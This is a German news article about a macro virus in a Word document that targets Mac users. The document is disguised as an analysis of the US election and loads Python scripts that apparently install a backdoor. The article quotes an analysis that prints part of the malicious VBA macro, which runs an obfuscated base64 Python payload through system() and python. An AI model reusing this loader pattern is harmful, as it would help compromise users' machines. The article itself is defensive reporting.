Makro-Virus greift Word-Nutzer auf dem Mac an
Mithilfe der Makro-Unterstützung in Microsoft Office lassen sich wiederkehrende Aufgaben auch über mehrere Dokumente hinweg flexibel automatisieren. Angesichts der Möglichkeiten erlaubt dies Angreifern unter Umständen aber auch, Schädlinge einzuschleusen. Daher gelten Office-Dokumente mit integrierten Makros seit jeher als ein Sicherheitsrisiko und sollten nur bei vertrauenswürdigen Quellen geöffnet werden. Ganz aktuell ist dies bei einem Mac-Schädling, der momentan Umlauf ist.
Wie Sicherheitsexperten
berichten, findet momentan ein Word-Dokument mit schädlichen Makros Verbreitung, das unter dem Dateinamen
"U.S. Allies and Rivals Digest Trump’s Victory - Carnegie Endowment for International Peace.docm" eine englischsprachige Analyse des US-Wahlsiegs von Donald Trump verspricht. Tatsächlich versucht das Dokument aber auch, sofern auf dem Mac kein LittleSnitch läuft, schädliche Python-Scripts nachzuladen, die dann vermutlich mithilfe von Sicherheitslücken eine Hintertür in das System einrichten. Angreifer würden so die Kontrolle über das System erlangen.
Bedenklich ist in diesem Fall, dass nicht alle auf dem Markt befindlichen Virenscanner den schädlichen Makro erkennen. Immerhin warnt Microsoft Office selbst noch den Nutzer vor der Aktivierung der enthaltenen Makros. Je nach Arbeitshintergrund könnte diese Warnung von Nutzern aber "weggeklickt" und damit die Ausführung des Makros bestätigt werden. Offenbar spekulieren die Angreifer damit einmal mehr auf leichtsinnige Opfer, welche die letzten Hürden des Angriffs selber aus dem Weg räumen.
Auszug aus der Analyse
$ unzip "U.S. Allies and Rivals Digest Trump’s Victory - Carnegie Endowment for International Peace.docm"
inflating: [Content_Types].xml
inflating: _rels/.rels
inflating: word/_rels/document.xml.rels
inflating: word/document.xml
inflating: word/theme/theme1.xml
inflating: word/vbaProject.bin
...
Solche Anwender haben allerdings Glück im Unglück, denn aktuell ist der Server zum Nachladen der schädlichen Programmanweisungen nicht erreichbar. Ob der Angriff bereits vor einiger Zeit erfolgreich war, ist nicht bekannt. In jedem Fall sollten Mac-Nutzer bedenken, dass es trotz der verschiendenen Sicherheitsfunktionen von macOS wie beispielsweise Gatekeeper nach wie vor Möglichkeiten gibt, durch Trojaner wie einem Word-Dokument oder einer Browser-Seite das System zu beschädigen.
Weiterer Auszug aus der Analyse
$ sigtool --vba word/vbaProject.bin
...
cmd = "ZFhGcHJ2c2dNQlNJeVBmPSdhdGZNelpPcVZMYmNqJwppbXBvcnQgc3"
cmd = cmd + "NsOwppZiBoYXNhdHRyKHNzbCwgJ19jcmVhdGVfdW52ZXJpZm"
...
cmd = cmd + "0pKQpleGVjKCcnLmpvaW4ob3V0KSk="
result = system("echo ""import sys,base64;exec(base64.b64decode(\"" " & cmd & " \""));"" | python &")